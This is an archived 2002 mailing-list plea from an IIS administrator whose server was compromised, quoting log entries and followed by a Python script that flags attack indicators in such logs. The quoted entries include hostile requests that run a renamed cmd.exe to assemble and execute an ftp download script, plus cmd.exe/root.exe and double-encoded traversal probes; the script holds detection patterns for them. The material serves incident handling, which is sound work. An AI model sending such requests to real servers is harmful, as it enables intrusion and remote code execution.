IIS Server Log security breach?

From: GP (gpmobileat_private)
Date: Tue Feb 26 2002 - 13:09:15 PST


     Help, I recently found this on my IIS server after being contacted
     that my webserver attempted to scan someone's machine on port 80. I've
     looked on my web box and found the following files were installed:
     msxc32.exe, which seems to be the mIRC program, which is some type of chat
     program. I've talked to other techs here who have not installed this
     program. I've traced the following IP addresses back to the domain
     admins, but before I contact them I need to know if this is the intruder's IP
     address and what would be the best course of action. On the flip side,
     what do I need to do to prevent this from happening in the future? I
     have since blocked these addresses, but this is only a temp fix.
    
     18:56:21 156.63.205.48 GET
     /iisadmpwd/fuck.exe?/c+echo+get+shouldNT32.ocx+c:shouldNT32.ocx>>xl32.scr
     502
     18:56:23 156.63.205.2 GET
     /iisadmpwd/fuck.exe?/c+echo+get+shtlng32.dll+c:shtlng32.dll>>xl32.scr 502
     18:56:25 156.63.205.48 GET
     /iisadmpwd/fuck.exe?/c+echo+get+smba.dll+c:smba.dll>>xl32.scr 502
     18:56:27 156.63.205.2 GET
     /iisadmpwd/fuck.exe?/c+echo+get+sndrec32.dl_+c:sndrec32.dl_>>xl32.scr 502
     18:56:33 156.63.205.48 GET
     /iisadmpwd/fuck.exe?/c+echo+get+thds32.exe+c:thds32.exe>>xl32.scr 502
     18:56:35 156.63.205.2 GET
     /iisadmpwd/fuck.exe?/c+echo+get+winsd32.ocx+c:winsd32.ocx>>xl32.scr 502
     18:56:37 156.63.205.48 GET
     /iisadmpwd/fuck.exe?/c+echo+get+holes.txt+c:holes.txt>>xl32.scr 502
     18:56:39 156.63.205.47 GET /iisadmpwd/fuck.exe?/c+echo+bye>>xl32.scr 502
     18:56:54 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+ftp+-s:xl32.scr+-n+-d 502
     20:20:36 216.158.145.245 GET /scripts/root.exe?/c+dir 404
     20:20:36 216.158.145.245 GET /MSADC/root.exe?/c+dir 404
     20:20:36 216.158.145.245 GET /c/winnt/system32/cmd.exe?/c+dir 404
     20:20:36 216.158.145.245 GET /d/winnt/system32/cmd.exe?/c+dir 404
     20:20:36 216.158.145.245 GET
     /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404
     20:20:36 216.158.145.245 GET
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
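The log excerpt in the post is the kind of thing a defender wants to triage mechanically: which client IPs issued command-execution requests, which of those were double-encoded traversal probes, and which requests came back 404 (path absent, probe failed) versus 502 (IIS launched the target as a CGI and got no valid headers back, i.e. the command most likely ran). The following Python script is an added example written for this page, not code from the poster or from SecurityFocus; it parses the "time IP method URI status" layout shown above, percent-decodes the URI repeatedly so `%255c` is seen as `\`, tags each entry with the indicators it contains, and groups the results per source IP. The sample entries are copied from the post (wrapped lines re-joined) plus two constructed benign requests; the indicator names and the 404/502 interpretation are the example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# One IIS log entry per line: time, client IP, method, URI-with-query, status.
LOG_RE = re.compile(
    r'^(?P<time>\d{2}:\d{2}:\d{2})\s+'
    r'(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+'
    r'(?P<method>[A-Z]+)\s+'
    r'(?P<uri>\S+)\s+'
    r'(?P<status>\d{3})$'
)

# Indicator patterns are applied to the URI after '+' -> space and repeated
# percent-decoding, so double-encoded traversal (%255c) is caught as well.
INDICATORS = [
    ("cmd-exec",     re.compile(r'(?:cmd|root)\.exe', re.I)),   # shell reachable via the web root
    ("cmd-switch",   re.compile(r'\.exe\?/c(?:\s|$)', re.I)),   # any executable invoked with /c
    ("traversal",    re.compile(r'\.\.[\\/]')),                  # ../ or ..\ after decoding
    ("script-build", re.compile(r'\becho\s.*>>', re.I)),        # writing a file one line at a time
    ("ftp-script",   re.compile(r'\bftp\s+-s:', re.I)),         # running the assembled ftp script
]

def decode_uri(uri, rounds=3):
    """Turn '+' into spaces and percent-decode until the string stops changing."""
    s = uri.replace('+', ' ')
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s

def status_hint(status):
    # 404: requested path absent, probe failed.  502: IIS ran the target as a CGI
    # but received no valid HTTP headers, so the command most likely executed.
    return {"404": "probe failed", "502": "likely executed"}.get(status, "unknown")

def analyze_line(line):
    """Return a dict describing one log entry, or None if the line does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    decoded = decode_uri(m['uri'])
    tags = [name for name, rx in INDICATORS if rx.search(decoded)]
    return {
        'time': m['time'], 'ip': m['ip'], 'status': m['status'],
        'decoded': decoded, 'tags': tags, 'hint': status_hint(m['status']),
    }

def summarize(lines):
    """Group flagged entries per client IP: request count, indicators seen, likely executions."""
    per_ip = defaultdict(lambda: {'requests': 0, 'tags': set(), 'likely_executed': 0})
    for line in lines:
        e = analyze_line(line)
        if not e or not e['tags']:
            continue          # unparseable or benign: nothing to report
        rec = per_ip[e['ip']]
        rec['requests'] += 1
        rec['tags'].update(e['tags'])
        if e['hint'] == 'likely executed':
            rec['likely_executed'] += 1
    return dict(per_ip)

# Entries taken from the post above (wrapped lines re-joined) plus two constructed benign requests.
SAMPLE_LOG = [
    "18:56:39 156.63.205.47 GET /iisadmpwd/fuck.exe?/c+echo+bye>>xl32.scr 502",
    "18:56:54 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+ftp+-s:xl32.scr+-n+-d 502",
    "20:20:36 216.158.145.245 GET /scripts/root.exe?/c+dir 404",
    "20:20:36 216.158.145.245 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404",
    "20:21:00 10.0.0.5 GET /index.html 200",        # constructed, benign
    "20:21:02 10.0.0.5 GET /images/logo.gif 200",   # constructed, benign
]

if __name__ == "__main__":
    for ip, rec in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {rec['requests']} flagged request(s), "
              f"{rec['likely_executed']} likely executed, tags={sorted(rec['tags'])}")
```

Read against the post, the report separates the two activities: the 216.158.145.245 entries are traversal probes that all returned 404, while the 156.63.205.x entries invoked an executable with `/c` and returned 502, which is why those hosts, and the `xl32.scr` file they assembled, are the ones worth investigating first.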
    



    This archive was generated by hypermail 2b30 : Tue Feb 26 2002 - 15:09:01 PST